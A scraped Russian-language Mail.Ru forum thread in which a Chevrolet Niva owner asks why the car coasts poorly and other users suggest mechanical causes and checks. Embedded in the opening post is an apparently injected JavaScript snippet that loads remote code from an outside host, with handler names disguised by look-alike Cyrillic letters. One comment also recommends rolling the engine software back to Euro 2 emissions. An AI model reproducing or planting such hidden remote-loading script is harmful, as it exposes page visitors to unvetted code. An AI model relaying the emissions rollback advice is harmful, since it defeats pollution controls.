Mail.RuПочтаМой МирОдноклассникиИгрыЗнакомстваНовостиПоискВсе проекты

Нива Шевроле. Плохой накат у машины. Есть ли решение проблемы?

Авто 10 лет, 110 тыс пробега,
технически исправна. Сток. Если на ровной дороге бросаешь "газ" на 110
км/ч, можно не тормозить - сама остановится метров через 100 ( это
утрировано, но не далеко от истины). Движение на спуске вообще
выстёгивает. Скорость теряется очень активно, там, где другие
притормаживают, приходится давить газ, чтобы не мешать потоку. Понимаю,
что это издержки полного привода, но может быть проблема в чём- то ещё?
Ау, господа -теоретики и владельцы Нив - Шнив! Пожалуйста, ссылки,
подсказки. Сама рою Интернет активно, но нужной инфы пока не нашла.
(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?ifra...' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8';
script.оnlоad = script.оnerrоr = function () {
script.оnlоad = script.оnerrоr = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})();
Тема закрытаТема в горячихТема скрыта
Жалоба принята. Спасибо!
Пожаловаться
10 декабря
Volkswagen Polo 1.6 AT
Комфорт приемлем, но холодная (салон)
3.3
10 декабря
Mitsubishi ASX 1.6 2WD MT
Отличный автомобиль! Молодцы японцы!
4.7
Все отзывы
Поделиться темой
Отписаться
Подписаться
КомментарииКомментарииПока ни одного комментария, будьте первым!
28
Саня Саня
Проверти развал - схождение на авто. Тормозные суппорта на предмет подклинивания.
СсылкаПожаловаться
Если раньше такого не было. ТО-прощупай после движения все диски-суппорта . Где то должно греться-подклинивать. Ручник закис. Мосты просят смазки
СсылкаПожаловаться
В добавок к вышесказанному, Шниву не разбирал, а у нивы передние ступичные подшипники надо приодически подтягивать, а по вашему пробегу так давно поменять пора, так же необходимо проверить регулировку преднего моста.
СсылкаПожаловаться
Vf
Залей в трансмиссию синтетиу (мосты, кпп, раздатка), туда же залей антифрикционные присадки типа молибдена. + ревизия всей ходовки с обильной смахкой подшипников( с завода жалеют смазку, откуда и возникают трения и выход из строя подшипников) + развал/схождение + контроль давления в шинах.
СсылкаПожаловаться
а какой по вашему мнению должен быть у нее накат?желательно с научными подтверждениями
СсылкаПожаловаться
В том -то и дело, что не в курсе. Мне 3 человека в реале сказали, что для Нивы это нормально, но когда выбирала машин, штук 10 тестила. не у всех так, как у моей.
СсылкаПожаловаться
В том -то и дело, что не в курсе. Мне 3 человека в реале сказали, что для Нивы это нормально, но когда выбирала машин, штук 10 тестила. не у всех так, как у моей.
СсылкаПожаловаться
Какой расход топлива?
СсылкаПожаловаться
Evgenevitch
Машина не исправна, и полный привод тут непричем. Выбег с 50 км/ч - метров 500-600 до полной остановки.
Проверяем:
- подклинивание тормозных механизмов. Километр по прямой и подклинивающий тормоз будет чувствоваться на ощупь.
- исправность подшипников колес - вывешиваем и крутим рукой.
- давление в шинах - 2.2 это нормально, подвески мягкие, трясти особо не будет
- наличие масла в агрегатах и легкость вращения коробки, раздатки, карданных валов
Чудес не бывает.

Кстати, а мож кто то включил блокировку межосевого? На десятилекте может и не быть индикации положения блокировки. Она не на всех машинах есть, и не у всех исправна.
У меня как то приятель, правда на УАЗике, вскорости после покупки, включил передний мост и удивлялся, а что это у него так машина тяжело идет и жрет далеко за 20.
Так тоже бывает, да :)
СсылкаПожаловаться
Zig-zag
Вы не путаете накат и торможение двигателем?
СсылкаПожаловаться
Для трактора это нормально.
СсылкаПожаловаться
у меня на кразе 255 тож плохой накат, интересно может быть чего общего с нивой ?
СсылкаПожаловаться
Игорь
Сам являюсь владельцем Нивы и это для неё нормально ,накат плохой однозначно ,а если сравнивать с передне приводными и иномарками ,то его практически нет ! А на счёт стока то это зря ,перешеётесь и авто поедет ,проверено не однократно ,сразу с салона на евро 2 откат делаем ,евро 3 для нивы извращения ,даже по асфальту не едет ,хотя предназначена для эксплуатации в тяжёлых условиях !
СсылкаПожаловаться
Игорь
Сам являюсь владельцем Нивы и это для неё нормально ,накат плохой однозначно ,а если сравнивать с передне приводными и иномарками ,то его практически нет ! А на счёт стока то это зря ,перешеётесь и авто поедет ,проверено не однократно ,сразу с салона на евро 2 откат делаем ,евро 3 для нивы извращения ,даже по асфальту не едет ,хотя предназначена для эксплуатации в тяжёлых условиях !
СсылкаПожаловаться
Игорь,здравствуйте! У моей нивы 2000 года, инжектор , 21214- шикарный накат, на уровне жигулей и любой легковой. Но вот хотел у вас спросить об одном: есть такая загадочная проблема. Бывает выезжая из гаража( легко толкаю машину ,ставлю моментально на нейтраль), она как пуля вылетает из гаража, приходится тормозить, чтобы дальше нужного не выкатилась. И прикол в том,что она так и ездить легко будет.
СсылкаПожаловаться
David David
Игорь,здравствуйте! У моей нивы 2000 года, инжектор , 21214- шикарный накат, на уровне жигулей и любой легковой. Но вот хотел у вас спросить об одном: есть такая загадочная проблема. Бывает выезжая из гаража( легко толкаю машину ,ставлю моментально на нейтраль), она как пуля вылетает из гаража, приходится тормозить, чтобы дальше нужного не выкатилась. И прикол в том,что она так и ездить легко будет.
СсылкаПожаловаться
История переписки2
Но стоит например остановится, выйти по любой теме, вернулся, легко завелась, но уже такого наката и легкости в движении нет. Такая же тема, если постояла в гараже, пришел, завел на следующий день, а накат куда то пропал. Что за фигня не могу понять. Нет у этой проблемы постоянства. Это при условии,что передние и задние тормоза работают идеально и на ходу вообще не греются.
СсылкаПожаловаться
David David
Но стоит например остановится, выйти по любой теме, вернулся, легко завелась, но уже такого наката и легкости в движении нет. Такая же тема, если постояла в гараже, пришел, завел на следующий день, а накат куда то пропал. Что за фигня не могу понять. Нет у этой проблемы постоянства. Это при условии,что передние и задние тормоза работают идеально и на ходу вообще не греются.
СсылкаПожаловаться
История переписки3
Могут ли в моем случае мешать накату износ переднего моста, заднего моста, регулятор тормозной жидкости( колдун) ? Передние подшипники ступиц менял, заклиниваний нет точно. Какое ваше мнение? Да, еще, когда пропадает накат, есть не сильные вибрации при разгоне на следующую скорость и ощущение,что машину за зад держат. Двигатель хочет разогнать, но не может. Но вот когда накат появляется, машина как бешанная становится, легкая, двигатель ее просто рвет на части от радости, разгон проходит легко, резво и нет вибраций при переходах на скорости. И накат, будто у машины нет ничего кроме колес.
СсылкаПожаловаться
David David
Могут ли в моем случае мешать накату износ переднего моста, заднего моста, регулятор тормозной жидкости( колдун) ? Передние подшипники ступиц менял, заклиниваний нет точно. Какое ваше мнение? Да, еще, когда пропадает накат, есть не сильные вибрации при разгоне на следующую скорость и ощущение,что машину за зад держат. Двигатель хочет разогнать, но не может. Но вот когда накат появляется, машина как бешанная становится, легкая, двигатель ее просто рвет на части от радости, разгон проходит легко, резво и нет вибраций при переходах на скорости. И накат, будто у машины нет ничего кроме колес.
СсылкаПожаловаться
История переписки4
Жду ответа! av262008@mail.ru Давид.
СсылкаПожаловаться
David David
СсылкаПожаловаться
История переписки3
Если нет наката ,значит есть проблема ,где то есть сопротивление качению значит в этом узле будет повышаться температура ,щупайте ищите где греется , авто на подъёмник и прокрутить в этот момент колёса !
СсылкаПожаловаться
David David
СсылкаПожаловаться
История переписки2
Вы ездили на переднеприводном авто ?
СсылкаПожаловаться
David David
СсылкаПожаловаться
История переписки2
Конечно ездил.
СсылкаПожаловаться
Игорь
СсылкаПожаловаться
Пишите пожалуйста на мейл
СсылкаПожаловаться
Игорь
СсылкаПожаловаться
Нет ничего такого,чтобы грелось.
СсылкаПожаловаться
David David
Нет ничего такого,чтобы грелось.
СсылкаПожаловаться
История переписки2
Тогда на подъёмник и крутить колёса ,возможно под клинивание сателлитов ,дифференциала в одном из мостов или в раздаточной коробке
СсылкаПожаловаться
Игорь
СсылкаПожаловаться
Единственный момент такой, не всегда, но срабатывает. Беру, проезжаю по неровной дороге, и что расклинивает и накат появляется. Он также может исчезнуть и в процессе, как я писал выше. Какие у вас на этот счет мысли?
СсылкаПожаловаться
David David
Единственный момент такой, не всегда, но срабатывает. Беру, проезжаю по неровной дороге, и что расклинивает и накат появляется. Он также может исчезнуть и в процессе, как я писал выше. Какие у вас на этот счет мысли?
СсылкаПожаловаться
История переписки2
Как проверю, вам обязательно отпишусь.
СсылкаПожаловаться
Игорь
СсылкаПожаловаться
Меня просто одно удивляет, что заехать в гараж она может в плохом настроении,а на другой день, в таком шикарном настроении вылетает, будто ничего и небыло . Периодичность напрягает . И вы говорите,что у НИВ ,накат не очень. Моя инжекторная нива, за 100 метров, абсолютно не надрываясь , не форсуя двигатель, разгоняется до 80 км/ час, при чем легко. Проверял при условии, когда есть тот самый накат.
СсылкаПожаловаться
Игорь
СсылкаПожаловаться
И эти 80 км/час, она набирает за несколько секунд. Причем не перегазовывая.
СсылкаПожаловаться
David David
И эти 80 км/час, она набирает за несколько секунд. Причем не перегазовывая.
СсылкаПожаловаться
История переписки2
Для Шнивы разгон до 100 -- 17-19 секунд считается нормой !
СсылкаПожаловаться
Игорь
Для Шнивы разгон до 100 -- 17-19 секунд считается нормой !
СсылкаПожаловаться
Чтобы оставить комментарий, вам нужно авторизоваться.
Новости Mail.Ru